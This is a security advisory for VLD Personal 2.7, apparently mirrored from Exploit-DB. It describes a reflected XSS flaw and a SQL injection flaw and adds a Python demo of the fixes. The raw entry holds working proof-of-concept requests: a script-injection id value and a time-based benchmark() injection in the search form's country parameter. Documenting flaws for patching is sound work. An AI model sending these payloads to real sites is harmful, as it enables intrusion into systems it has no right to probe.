Vendor: VLD Personal
By: Mr T
CVSS: 5.5 (MEDIUM)
Vulnerability types: XSS Attack, SQL Injection
CWE: 79, 89
Product Name: VLD Personal
Affected Version From: 2.7
Affected Version To: 2.7.2001
Patch Exists: YES
Related CWE:
CPE: a:vldpersonals:vld_personal:2.7
Metasploit:
Other Scripts:
Platforms Tested: Windows, Linux
Year: 2014

VLD Personal – Multiple Vulnerabilities

The XSS vulnerability is caused by the value of the id request parameter being copied into an HTML tag attribute without proper sanitization. The SQL injection vulnerability is caused by the country, gender1 and gender2 parameters of the search form being incorporated into SQL queries without parameterization, so their values are parsed as SQL.

Mitigation:

To mitigate the XSS vulnerability, proper input sanitization should be implemented. To mitigate the SQL injection vulnerability, proper parameterized queries should be used.
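As an added illustration of both mitigations (example code written for this page, not part of VLD Personal or of the advisory), the following Python script contrasts each vulnerable pattern with its fix: the profile link is built by encoding the id at the HTML attribute sink, and the member search binds country and gender as query parameters instead of concatenating them. The members table, its column names, the link template and the sample request values are constructed for the demo; an in-memory SQLite database stands in for the application's real backend. SQLite has no benchmark() function (it is a MySQL function), so the concatenated query fails at parse time, which is enough to show that the client-supplied expression reached the SQL engine, whereas the parameterized query treats the same string as an ordinary value.

```python
import html
import sqlite3

# Constructed sample values, shaped like the payloads quoted in the advisory.
XSS_ID = '9811c"><script>alert(1)</script>b7ec317c816'
SQLI_COUNTRY = "1 and benchmark(20000000,sha1(1))-- "


def profile_link_unsafe(member_id: str) -> str:
    """Vulnerable pattern: the raw id is copied into a double-quoted attribute."""
    return f'<a href="index.php?m=member_profile&p=profile&id={member_id}">profile</a>'


def profile_link_safe(member_id: str) -> str:
    """Fixed: encode at the HTML sink. quote=True also encodes '"' and "'",
    so the value can never terminate the attribute it sits in."""
    encoded = html.escape(member_id, quote=True)
    return f'<a href="index.php?m=member_profile&p=profile&id={encoded}">profile</a>'


def attribute_breakout(rendered: str) -> bool:
    """True if the markup has more than the two quotes that delimit href
    (the parameter closed the attribute early) or carries a script tag."""
    return rendered.count('"') != 2 or "<script" in rendered


def make_db() -> sqlite3.Connection:
    """Constructed members table; the schema is hypothetical, not the vendor's."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE members (id INTEGER PRIMARY KEY, country INTEGER, gender INTEGER)"
    )
    conn.executemany(
        "INSERT INTO members VALUES (?, ?, ?)", [(1, 1, 2), (2, 1, 1), (3, 44, 2)]
    )
    return conn


def search_unsafe(conn: sqlite3.Connection, country: str, gender: str) -> list:
    """Vulnerable pattern: request parameters are spliced into the SQL text,
    so whatever the client sends is parsed as SQL."""
    sql = f"SELECT id FROM members WHERE country = {country} AND gender = {gender}"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn: sqlite3.Connection, country: str, gender: str) -> list:
    """Fixed: placeholders; the driver binds the values, which are never parsed as SQL."""
    sql = "SELECT id FROM members WHERE country = ? AND gender = ?"
    return [row[0] for row in conn.execute(sql, (country, gender))]


def injected_sql_reaches_parser(conn: sqlite3.Connection, country: str) -> bool:
    """True when the concatenated query fails because the engine tried to resolve
    a function name supplied by the client. SQLite reports it as 'no such function';
    a backend that does have the function would simply run it."""
    try:
        search_unsafe(conn, country, "2")
    except sqlite3.OperationalError as exc:
        return "no such function" in str(exc)
    return False


if __name__ == "__main__":
    print(profile_link_unsafe(XSS_ID))
    print(profile_link_safe(XSS_ID))
    db = make_db()
    print("benign search:", search_safe(db, "1", "2"))
    print("injected SQL parsed by engine:", injected_sql_reaches_parser(db, SQLI_COUNTRY))
    print("same payload bound as a value:", search_safe(db, SQLI_COUNTRY, "2"))
```

The two fixes are independent: encoding belongs at the point where data is written into HTML (an attribute here, so the quote characters must be encoded too), and parameter binding belongs at the point where data is handed to the database. Validating the id and country fields as integers before use is a worthwhile extra layer, but it does not replace either sink-side control.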

Exploit-DB raw data:

# Exploit Title: VLD Personal – Multiple Vulnerabilities
# Date: 09/11/2014
# Exploit Author: Mr T
# Exploit Authors Website: http://www.securitypentester.ninja
# Vendor Homepage: http://www.vldpersonals.com/
# Software Link: http://www.vldpersonals.com/clients/downloads.php
# Vulnerable Version: 2.7
# Fixed Version 2.7.1
# Tested on: Windows / Linux

XSS Attack

Issue detail:
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9811c"><script>alert(1)</script>b7ec317c816 was submitted in the id parameter.

Response:
GET /index.php?m=member_profile&p=profile&id=9811c"><script>alert(1)<%2fscript>b7ec317c816 HTTP/1.1



SQL Injection:
Issue detail:
The country/gender1/gender2 parameter appears to be vulnerable to SQL injection attacks. The payload and benchmark(20000000,sha1(1))-- was submitted in the country parameter.

Response:
POST /index.php?m=search HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
Cookie: visitors=x466x3878x3725x3797; PHPSESSID=nu75qtji88q4bilghhtg2s2; sessdata=0
age_from=19&age_to=19&issearch=1&submit=Search&gender1=2&gender2=2&type_id=members&country=1%20and%20benchmark(20000000%2csha1(1))--%20


-- 
Talib Osmani